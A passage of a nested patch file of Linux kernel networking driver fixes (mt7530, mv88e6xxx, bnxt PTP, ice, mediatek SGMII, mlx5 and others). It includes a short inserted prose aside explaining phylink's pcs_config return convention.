++			   RG_SYSPLL_POSDIV(1));
++		core_write(priv, CORE_PLL_GROUP7,
++			   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
++			   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
++
++		/* Enable MT7530 core and TRGMII Tx clocks */
++		core_set(priv, CORE_TRGMII_GSW_CLK_CG,
++			 REG_GSWCK_EN | REG_TRGMIICK_EN);
++	} else {
+ 		for (i = 0 ; i < NUM_TRGMII_CTRL; i++)
+ 			mt7530_rmw(priv, MT7530_TRGMII_RD(i),
+ 				   RD_TAP_MASK, RD_TAP(16));
++	}
++
+ 	return 0;
+ }
+ 
+@@ -2206,7 +2206,7 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	mt7530_pll_setup(priv);
+ 
+-	/* Enable Port 6 only; P5 as GMAC5 which currently is not supported */
++	/* Enable port 6 */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+ 	val |= MHWTRAP_MANUAL;
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 242b8b325504a..89829e0ca8e8f 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3549,7 +3549,7 @@ static int mv88e6xxx_get_max_mtu(struct dsa_switch *ds, int port)
+ 		return 10240 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
+ 	else if (chip->info->ops->set_max_frame_size)
+ 		return 1632 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
+-	return 1522 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
++	return ETH_DATA_LEN;
+ }
+ 
+ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+@@ -3557,6 +3557,17 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 	struct mv88e6xxx_chip *chip = ds->priv;
+ 	int ret = 0;
+ 
++	/* For families where we don't know how to alter the MTU,
++	 * just accept any value up to ETH_DATA_LEN
++	 */
++	if (!chip->info->ops->port_set_jumbo_size &&
++	    !chip->info->ops->set_max_frame_size) {
++		if (new_mtu > ETH_DATA_LEN)
++			return -EINVAL;
++
++		return 0;
++	}
++
+ 	if (dsa_is_dsa_port(ds, port) || dsa_is_cpu_port(ds, port))
+ 		new_mtu += EDSA_HLEN;
+ 
+@@ -3565,9 +3576,6 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 		ret = chip->info->ops->port_set_jumbo_size(chip, port, new_mtu);
+ 	else if (chip->info->ops->set_max_frame_size)
+ 		ret = chip->info->ops->set_max_frame_size(chip, new_mtu);
+-	else
+-		if (new_mtu > 1522)
+-			ret = -EINVAL;
+ 	mv88e6xxx_reg_unlock(chip);
+ 
+ 	return ret;
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 1e8d902e1c8ea..7f933175cbdac 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -412,6 +412,25 @@ int aq_xdp_xmit(struct net_device *dev, int num_frames,
+ 	return num_frames - drop;
+ }
+ 
++static struct sk_buff *aq_xdp_build_skb(struct xdp_buff *xdp,
++					struct net_device *dev,
++					struct aq_ring_buff_s *buff)
++{
++	struct xdp_frame *xdpf;
++	struct sk_buff *skb;
++
++	xdpf = xdp_convert_buff_to_frame(xdp);
++	if (unlikely(!xdpf))
++		return NULL;
++
++	skb = xdp_build_skb_from_frame(xdpf, dev);
++	if (!skb)
++		return NULL;
++
++	aq_get_rxpages_xdp(buff, xdp);
++	return skb;
++}
++
+ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 				       struct xdp_buff *xdp,
+ 				       struct aq_ring_s *rx_ring,
+@@ -431,7 +450,7 @@ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 
+ 	prog = READ_ONCE(rx_ring->xdp_prog);
+ 	if (!prog)
+-		goto pass;
++		return aq_xdp_build_skb(xdp, aq_nic->ndev, buff);
+ 
+ 	prefetchw(xdp->data_hard_start); /* xdp_frame write */
+ 
+@@ -442,17 +461,12 @@ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 	act = bpf_prog_run_xdp(prog, xdp);
+ 	switch (act) {
+ 	case XDP_PASS:
+-pass:
+-		xdpf = xdp_convert_buff_to_frame(xdp);
+-		if (unlikely(!xdpf))
+-			goto out_aborted;
+-		skb = xdp_build_skb_from_frame(xdpf, aq_nic->ndev);
++		skb = aq_xdp_build_skb(xdp, aq_nic->ndev, buff);
+ 		if (!skb)
+ 			goto out_aborted;
+ 		u64_stats_update_begin(&rx_ring->stats.rx.syncp);
+ 		++rx_ring->stats.rx.xdp_pass;
+ 		u64_stats_update_end(&rx_ring->stats.rx.syncp);
+-		aq_get_rxpages_xdp(buff, xdp);
+ 		return skb;
+ 	case XDP_TX:
+ 		xdpf = xdp_convert_buff_to_frame(xdp);
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 25d1642c10c3b..b44b2ec5e61a2 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -6991,11 +6991,9 @@ static int bnxt_hwrm_func_qcfg(struct bnxt *bp)
+ 		if (flags & FUNC_QCFG_RESP_FLAGS_FW_DCBX_AGENT_ENABLED)
+ 			bp->fw_cap |= BNXT_FW_CAP_DCBX_AGENT;
+ 	}
+-	if (BNXT_PF(bp) && (flags & FUNC_QCFG_RESP_FLAGS_MULTI_HOST)) {
++	if (BNXT_PF(bp) && (flags & FUNC_QCFG_RESP_FLAGS_MULTI_HOST))
+ 		bp->flags |= BNXT_FLAG_MULTI_HOST;
+-		if (bp->fw_cap & BNXT_FW_CAP_PTP_RTC)
+-			bp->fw_cap &= ~BNXT_FW_CAP_PTP_RTC;
+-	}
++
+ 	if (flags & FUNC_QCFG_RESP_FLAGS_RING_MONITOR_ENABLED)
+ 		bp->fw_cap |= BNXT_FW_CAP_RING_MONITOR;
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index 5163ef4a49ea3..56355e64815e2 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -1992,6 +1992,8 @@ struct bnxt {
+ 	u32			fw_dbg_cap;
+ 
+ #define BNXT_NEW_RM(bp)		((bp)->fw_cap & BNXT_FW_CAP_NEW_RM)
++#define BNXT_PTP_USE_RTC(bp)	(!BNXT_MH(bp) && \
++				 ((bp)->fw_cap & BNXT_FW_CAP_PTP_RTC))
+ 	u32			hwrm_spec_code;
+ 	u16			hwrm_cmd_seq;
+ 	u16                     hwrm_cmd_kong_seq;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+index 4ec8bba18cdd2..a3a3978a4d1c2 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+@@ -63,7 +63,7 @@ static int bnxt_ptp_settime(struct ptp_clock_info *ptp_info,
+ 						ptp_info);
+ 	u64 ns = timespec64_to_ns(ts);
+ 
+-	if (ptp->bp->fw_cap & BNXT_FW_CAP_PTP_RTC)
++	if (BNXT_PTP_USE_RTC(ptp->bp))
+ 		return bnxt_ptp_cfg_settime(ptp->bp, ns);
+ 
+ 	spin_lock_bh(&ptp->ptp_lock);
+@@ -196,7 +196,7 @@ static int bnxt_ptp_adjtime(struct ptp_clock_info *ptp_info, s64 delta)
+ 	struct bnxt_ptp_cfg *ptp = container_of(ptp_info, struct bnxt_ptp_cfg,
+ 						ptp_info);
+ 
+-	if (ptp->bp->fw_cap & BNXT_FW_CAP_PTP_RTC)
++	if (BNXT_PTP_USE_RTC(ptp->bp))
+ 		return bnxt_ptp_adjphc(ptp, delta);
+ 
+ 	spin_lock_bh(&ptp->ptp_lock);
+@@ -205,34 +205,39 @@ static int bnxt_ptp_adjtime(struct ptp_clock_info *ptp_info, s64 delta)
+ 	return 0;
+ }
+ 
++static int bnxt_ptp_adjfine_rtc(struct bnxt *bp, long scaled_ppm)
++{
++	s32 ppb = scaled_ppm_to_ppb(scaled_ppm);
++	struct hwrm_port_mac_cfg_input *req;
++	int rc;
++
++	rc = hwrm_req_init(bp, req, HWRM_PORT_MAC_CFG);
++	if (rc)
++		return rc;
++
++	req->ptp_freq_adj_ppb = cpu_to_le32(ppb);
++	req->enables = cpu_to_le32(PORT_MAC_CFG_REQ_ENABLES_PTP_FREQ_ADJ_PPB);
++	rc = hwrm_req_send(bp, req);
++	if (rc)
++		netdev_err(bp->dev,
++			   "ptp adjfine failed. rc = %d\n", rc);
++	return rc;
++}
++
+ static int bnxt_ptp_adjfine(struct ptp_clock_info *ptp_info, long scaled_ppm)
+ {
+ 	struct bnxt_ptp_cfg *ptp = container_of(ptp_info, struct bnxt_ptp_cfg,
+ 						ptp_info);
+-	struct hwrm_port_mac_cfg_input *req;
+ 	struct bnxt *bp = ptp->bp;
+-	int rc = 0;
+ 
+-	if (!(ptp->bp->fw_cap & BNXT_FW_CAP_PTP_RTC)) {
+-		spin_lock_bh(&ptp->ptp_lock);
+-		timecounter_read(&ptp->tc);
+-		ptp->cc.mult = adjust_by_scaled_ppm(ptp->cmult, scaled_ppm);
+-		spin_unlock_bh(&ptp->ptp_lock);
+-	} else {
+-		s32 ppb = scaled_ppm_to_ppb(scaled_ppm);
+-
+-		rc = hwrm_req_init(bp, req, HWRM_PORT_MAC_CFG);
+-		if (rc)
+-			return rc;
++	if (BNXT_PTP_USE_RTC(bp))
++		return bnxt_ptp_adjfine_rtc(bp, scaled_ppm);
+ 
+-		req->ptp_freq_adj_ppb = cpu_to_le32(ppb);
+-		req->enables = cpu_to_le32(PORT_MAC_CFG_REQ_ENABLES_PTP_FREQ_ADJ_PPB);
+-		rc = hwrm_req_send(ptp->bp, req);
+-		if (rc)
+-			netdev_err(ptp->bp->dev,
+-				   "ptp adjfine failed. rc = %d\n", rc);
+-	}
+-	return rc;
++	spin_lock_bh(&ptp->ptp_lock);
++	timecounter_read(&ptp->tc);
++	ptp->cc.mult = adjust_by_scaled_ppm(ptp->cmult, scaled_ppm);
++	spin_unlock_bh(&ptp->ptp_lock);
++	return 0;
+ }
+ 
+ void bnxt_ptp_pps_event(struct bnxt *bp, u32 data1, u32 data2)
+@@ -879,7 +884,7 @@ int bnxt_ptp_init_rtc(struct bnxt *bp, bool phc_cfg)
+ 	u64 ns;
+ 	int rc;
+ 
+-	if (!bp->ptp_cfg || !(bp->fw_cap & BNXT_FW_CAP_PTP_RTC))
++	if (!bp->ptp_cfg || !BNXT_PTP_USE_RTC(bp))
+ 		return -ENODEV;
+ 
+ 	if (!phc_cfg) {
+@@ -932,13 +937,14 @@ int bnxt_ptp_init(struct bnxt *bp, bool phc_cfg)
+ 	atomic_set(&ptp->tx_avail, BNXT_MAX_TX_TS);
+ 	spin_lock_init(&ptp->ptp_lock);
+ 
+-	if (bp->fw_cap & BNXT_FW_CAP_PTP_RTC) {
++	if (BNXT_PTP_USE_RTC(bp)) {
+ 		bnxt_ptp_timecounter_init(bp, false);
+ 		rc = bnxt_ptp_init_rtc(bp, phc_cfg);
+ 		if (rc)
+ 			goto out;
+ 	} else {
+ 		bnxt_ptp_timecounter_init(bp, true);
++		bnxt_ptp_adjfine_rtc(bp, 0);
+ 	}
+ 
+ 	ptp->ptp_info = bnxt_ptp_caps;
+diff --git a/drivers/net/ethernet/i825xx/sni_82596.c b/drivers/net/ethernet/i825xx/sni_82596.c
+index daec9ce04531b..54bb4d9a0d1ea 100644
+--- a/drivers/net/ethernet/i825xx/sni_82596.c
++++ b/drivers/net/ethernet/i825xx/sni_82596.c
+@@ -78,6 +78,7 @@ static int sni_82596_probe(struct platform_device *dev)
+ 	void __iomem *mpu_addr;
+ 	void __iomem *ca_addr;
+ 	u8 __iomem *eth_addr;
++	u8 mac[ETH_ALEN];
+ 
+ 	res = platform_get_resource(dev, IORESOURCE_MEM, 0);
+ 	ca = platform_get_resource(dev, IORESOURCE_MEM, 1);
+@@ -109,12 +110,13 @@ static int sni_82596_probe(struct platform_device *dev)
+ 		goto probe_failed;
+ 
+ 	/* someone seems to like messed up stuff */
+-	netdevice->dev_addr[0] = readb(eth_addr + 0x0b);
+-	netdevice->dev_addr[1] = readb(eth_addr + 0x0a);
+-	netdevice->dev_addr[2] = readb(eth_addr + 0x09);
+-	netdevice->dev_addr[3] = readb(eth_addr + 0x08);
+-	netdevice->dev_addr[4] = readb(eth_addr + 0x07);
+-	netdevice->dev_addr[5] = readb(eth_addr + 0x06);
++	mac[0] = readb(eth_addr + 0x0b);
++	mac[1] = readb(eth_addr + 0x0a);
++	mac[2] = readb(eth_addr + 0x09);
++	mac[3] = readb(eth_addr + 0x08);
++	mac[4] = readb(eth_addr + 0x07);
++	mac[5] = readb(eth_addr + 0x06);
++	eth_hw_addr_set(netdevice, mac);
+ 	iounmap(eth_addr);
+ 
+ 	if (netdevice->irq < 0) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 52eec0a50492b..8328139db3795 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -15518,6 +15518,7 @@ static int i40e_init_recovery_mode(struct i40e_pf *pf, struct i40e_hw *hw)
+ 	int err;
+ 	int v_idx;
+ 
++	pci_set_drvdata(pf->pdev, pf);
+ 	pci_save_state(pf->pdev);
+ 
+ 	/* set up periodic task facility */
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index 713069f809ec4..3cad5e6b2ad18 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -506,6 +506,7 @@ enum ice_pf_flags {
+ 	ICE_FLAG_VF_VLAN_PRUNING,
+ 	ICE_FLAG_LINK_LENIENT_MODE_ENA,
+ 	ICE_FLAG_PLUG_AUX_DEV,
++	ICE_FLAG_UNPLUG_AUX_DEV,
+ 	ICE_FLAG_MTU_CHANGED,
+ 	ICE_FLAG_GNSS,			/* GNSS successfully initialized */
+ 	ICE_PF_FLAGS_NBITS		/* must be last */
+@@ -950,16 +951,11 @@ static inline void ice_set_rdma_cap(struct ice_pf *pf)
+  */
+ static inline void ice_clear_rdma_cap(struct ice_pf *pf)
+ {
+-	/* We can directly unplug aux device here only if the flag bit
+-	 * ICE_FLAG_PLUG_AUX_DEV is not set because ice_unplug_aux_dev()
+-	 * could race with ice_plug_aux_dev() called from
+-	 * ice_service_task(). In this case we only clear that bit now and
+-	 * aux device will be unplugged later once ice_plug_aux_device()
+-	 * called from ice_service_task() finishes (see ice_service_task()).
++	/* defer unplug to service task to avoid RTNL lock and
++	 * clear PLUG bit so that pending plugs don't interfere
+ 	 */
+-	if (!test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
+-		ice_unplug_aux_dev(pf);
+-
++	clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags);
++	set_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags);
+ 	clear_bit(ICE_FLAG_RDMA_ENA, pf->flags);
+ }
+ #endif /* _ICE_H_ */
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 3811462824390..56155a04cc0c8 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -2316,18 +2316,15 @@ static void ice_service_task(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	if (test_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags)) {
+-		/* Plug aux device per request */
+-		ice_plug_aux_dev(pf);
++	/* unplug aux dev per request; if an unplug request came in
++	 * while processing a plug request, this will handle it
++	 */
++	if (test_and_clear_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags))
++		ice_unplug_aux_dev(pf);
+ 
+-		/* Mark plugging as done but check whether unplug was
+-		 * requested during ice_plug_aux_dev() call
+-		 * (e.g. from ice_clear_rdma_cap()) and if so then
+-		 * plug aux device.
+-		 */
+-		if (!test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
+-			ice_unplug_aux_dev(pf);
+-	}
++	/* Plug aux device per request */
++	if (test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
++		ice_plug_aux_dev(pf);
+ 
+ 	if (test_and_clear_bit(ICE_FLAG_MTU_CHANGED, pf->flags)) {
+ 		struct iidc_event *event;
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 374b7f10b549b..76b8ac3462266 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -184,8 +184,6 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 	}
+ 	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
+ 
+-	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
+-
+ 	ice_fill_txq_meta(vsi, tx_ring, &txq_meta);
+ 	err = ice_vsi_stop_tx_ring(vsi, ICE_NO_RESET, 0, tx_ring, &txq_meta);
+ 	if (err)
+@@ -200,10 +198,11 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		if (err)
+ 			return err;
+ 	}
++	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
++
+ 	err = ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, true);
+ 	if (err)
+ 		return err;
+-	ice_clean_rx_ring(rx_ring);
+ 
+ 	ice_qvec_toggle_napi(vsi, q_vector, false);
+ 	ice_qp_clean_rings(vsi, q_idx);
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index b481d0d46bb16..d4b4f9eaa4419 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -528,6 +528,10 @@
+ #define SGMII_SEND_AN_ERROR_EN		BIT(11)
+ #define SGMII_IF_MODE_MASK		GENMASK(5, 1)
+ 
++/* Register to reset SGMII design */
++#define SGMII_RESERVED_0	0x34
++#define SGMII_SW_RESET		BIT(0)
++
+ /* Register to set SGMII speed, ANA RG_ Control Signals III*/
+ #define SGMSYS_ANA_RG_CS3	0x2028
+ #define RG_PHY_SPEED_MASK	(BIT(2) | BIT(3))
+diff --git a/drivers/net/ethernet/mediatek/mtk_sgmii.c b/drivers/net/ethernet/mediatek/mtk_sgmii.c
+index bb00de1003ac4..83976dc868875 100644
+--- a/drivers/net/ethernet/mediatek/mtk_sgmii.c
++++ b/drivers/net/ethernet/mediatek/mtk_sgmii.c
+@@ -38,20 +38,16 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 			  const unsigned long *advertising,
+ 			  bool permit_pause_to_mac)
+ {
++	bool mode_changed = false, changed, use_an;
+ 	struct mtk_pcs *mpcs = pcs_to_mtk_pcs(pcs);
+ 	unsigned int rgc3, sgm_mode, bmcr;
+ 	int advertise, link_timer;
+-	bool changed, use_an;
+ 
+ 	advertise = phylink_mii_c22_pcs_encode_advertisement(interface,
+ 							     advertising);
+ 	if (advertise < 0)
+ 		return advertise;
+ 
+-	link_timer = phylink_get_link_timer_ns(interface);
+-	if (link_timer < 0)
+-		return link_timer;
+-
+ 	/* Clearing IF_MODE_BIT0 switches the PCS to BASE-X mode, and
+ 	 * we assume that fixes its speed at bitrate = line rate (in
+ 	 * other words, 1000Mbps or 2500Mbps).
+@@ -77,17 +73,24 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 	}
+ 
+ 	if (use_an) {
+-		/* FIXME: Do we need to set AN_RESTART here? */
+-		bmcr = SGMII_AN_RESTART | SGMII_AN_ENABLE;
++		bmcr = SGMII_AN_ENABLE;
+ 	} else {
+ 		bmcr = 0;
+ 	}
+ 
+ 	if (mpcs->interface != interface) {
++		link_timer = phylink_get_link_timer_ns(interface);
++		if (link_timer < 0)
++			return link_timer;
++
+ 		/* PHYA power down */
+ 		regmap_update_bits(mpcs->regmap, SGMSYS_QPHY_PWR_STATE_CTRL,
+ 				   SGMII_PHYA_PWD, SGMII_PHYA_PWD);
+ 
++		/* Reset SGMII PCS state */
++		regmap_update_bits(mpcs->regmap, SGMII_RESERVED_0,
++				   SGMII_SW_RESET, SGMII_SW_RESET);
++
+ 		if (interface == PHY_INTERFACE_MODE_2500BASEX)
+ 			rgc3 = RG_PHY_SPEED_3_125G;
+ 		else
+@@ -97,16 +100,17 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 		regmap_update_bits(mpcs->regmap, mpcs->ana_rgc3,
+ 				   RG_PHY_SPEED_3_125G, rgc3);
+ 
++		/* Setup the link timer */
++		regmap_write(mpcs->regmap, SGMSYS_PCS_LINK_TIMER, link_timer / 2 / 8);
++
+ 		mpcs->interface = interface;
++		mode_changed = true;
+ 	}
+ 
+ 	/* Update the advertisement, noting whether it has changed */
+ 	regmap_update_bits_check(mpcs->regmap, SGMSYS_PCS_ADVERTISE,
+ 				 SGMII_ADVERTISE, advertise, &changed);
+ 
+-	/* Setup the link timer and QPHY power up inside SGMIISYS */
+-	regmap_write(mpcs->regmap, SGMSYS_PCS_LINK_TIMER, link_timer / 2 / 8);
+-
+ 	/* Update the sgmsys mode register */
+ 	regmap_update_bits(mpcs->regmap, SGMSYS_SGMII_MODE,
+ 			   SGMII_REMOTE_FAULT_DIS | SGMII_SPEED_DUPLEX_AN |
+@@ -114,7 +118,7 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 
+ 	/* Update the BMCR */
+ 	regmap_update_bits(mpcs->regmap, SGMSYS_PCS_CONTROL_1,
+-			   SGMII_AN_RESTART | SGMII_AN_ENABLE, bmcr);
++			   SGMII_AN_ENABLE, bmcr);
+ 
+ 	/* Release PHYA power down state
+ 	 * Only removing bit SGMII_PHYA_PWD isn't enough.
+@@ -128,7 +132,7 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 	usleep_range(50, 100);
+ 	regmap_write(mpcs->regmap, SGMSYS_QPHY_PWR_STATE_CTRL, 0);
+ 
+-	return changed;
++	return changed || mode_changed;
+ }
+ 
+ static void mtk_pcs_restart_an(struct phylink_pcs *pcs)
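Dropping the direct SGMII_AN_RESTART write and returning changed ||
mode_changed leans on phylink's pcs_config() return convention: a negative
value is an error, and a positive value asks phylink itself to restart in-band
autonegotiation. Roughly, the caller side behaves like the sketch below
(simplified from phylink's major-config path; variable names are illustrative,
not the exact core code):

/* Simplified consumer of the pcs_config() return value: */
ret = pcs->ops->pcs_config(pcs, mode, interface, advertising, permit_pause);
if (ret < 0)
	phylink_err(pl, "pcs_config failed: %pe\n", ERR_PTR(ret));
else if (ret > 0)
	restart_an = true;	/* the PCS changed mode or advertisement */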
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+index 2d77fb8a8a015..ae73c9af8f251 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+@@ -313,7 +313,6 @@ struct mlx5e_params {
+ 		} channel;
+ 	} mqprio;
+ 	bool rx_cqe_compress_def;
+-	bool tunneled_offload_en;
+ 	struct dim_cq_moder rx_cq_moderation;
+ 	struct dim_cq_moder tx_cq_moderation;
+ 	struct mlx5e_packet_merge_param packet_merge;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index 7f6b940830b31..f84f1cfcddb85 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -89,8 +89,8 @@ struct mlx5e_macsec_rx_sc {
+ };
+ 
+ struct mlx5e_macsec_umr {
++	u8 __aligned(64) ctx[MLX5_ST_SZ_BYTES(macsec_aso)];
+ 	dma_addr_t dma_addr;
+-	u8 ctx[MLX5_ST_SZ_BYTES(macsec_aso)];
+ 	u32 mkey;
+ };
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 6c24f33a5ea5c..d6bcbc17151d7 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4923,8 +4923,6 @@ void mlx5e_build_nic_params(struct mlx5e_priv *priv, struct mlx5e_xsk *xsk, u16
+ 	/* TX inline */
+ 	mlx5_query_min_inline(mdev, &params->tx_min_inline_mode);
+ 
+-	params->tunneled_offload_en = mlx5_tunnel_inner_ft_supported(mdev);
+-
+ 	/* AF_XDP */
+ 	params->xsk = xsk;
+ 
+@@ -5223,7 +5221,7 @@ static int mlx5e_init_nic_rx(struct mlx5e_priv *priv)
+ 	}
+ 
+ 	features = MLX5E_RX_RES_FEATURE_PTP;
+-	if (priv->channels.params.tunneled_offload_en)
++	if (mlx5_tunnel_inner_ft_supported(mdev))
+ 		features |= MLX5E_RX_RES_FEATURE_INNER_FT;
+ 	err = mlx5e_rx_res_init(priv->rx_res, priv->mdev, features,
+ 				priv->max_nch, priv->drop_rq.rqn,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 7d90e5b728548..301a734b7c6a7 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -752,7 +752,6 @@ static void mlx5e_build_rep_params(struct net_device *netdev)
+ 	mlx5e_set_rx_cq_mode_params(params, cq_period_mode);
+ 
+ 	params->mqprio.num_tc       = 1;
+-	params->tunneled_offload_en = false;
+ 	if (rep->vport != MLX5_VPORT_UPLINK)
+ 		params->vlan_strip_disable = true;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 243d5d7750beb..c209e89ba9abe 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -4240,6 +4240,7 @@ int mlx5e_set_fwd_to_int_port_actions(struct mlx5e_priv *priv,
+ 
+ 	esw_attr->dest_int_port = dest_int_port;
+ 	esw_attr->dests[out_index].flags |= MLX5_ESW_DEST_CHAIN_WITH_SRC_PORT_CHANGE;
++	esw_attr->split_count = out_index;
+ 
+ 	/* Forward to root fdb for matching against the new source vport */
+ 	attr->dest_chain = 0;
+@@ -5373,6 +5374,16 @@ err_tun_mapping:
+ 
+ void mlx5e_tc_esw_cleanup(struct mlx5_rep_uplink_priv *uplink_priv)
+ {
++	struct mlx5e_rep_priv *rpriv;
++	struct mlx5_eswitch *esw;
++	struct mlx5e_priv *priv;
++
++	rpriv = container_of(uplink_priv, struct mlx5e_rep_priv, uplink_priv);
++	priv = netdev_priv(rpriv->netdev);
++	esw = priv->mdev->priv.eswitch;
++
++	mlx5e_tc_clean_fdb_peer_flows(esw);
++
+ 	mlx5e_tc_tun_cleanup(uplink_priv->encap);
+ 
+ 	mapping_destroy(uplink_priv->tunnel_enc_opts_mapping);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index f3b74cb67b71c..3992bf6337ca0 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -726,11 +726,11 @@ mlx5_eswitch_add_fwd_rule(struct mlx5_eswitch *esw,
+ 
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 	for (i = 0; i < esw_attr->split_count; i++) {
+-		if (esw_is_indir_table(esw, attr))
+-			err = esw_setup_indir_table(dest, &flow_act, esw, attr, spec, false, &i);
+-		else if (esw_is_chain_src_port_rewrite(esw, esw_attr))
+-			err = esw_setup_chain_src_port_rewrite(dest, &flow_act, esw, chains, attr,
+-							       &i);
++		if (esw_attr->dests[i].flags & MLX5_ESW_DEST_CHAIN_WITH_SRC_PORT_CHANGE)
++		/* Source port rewrite (forward to ovs internal port or stack device) isn't
++		 * supported in the rule of a split action.
++		 */
++			err = -EOPNOTSUPP;
+ 		else
+ 			esw_setup_vport_dest(dest, &flow_act, esw, esw_attr, i, i, false);
+ 
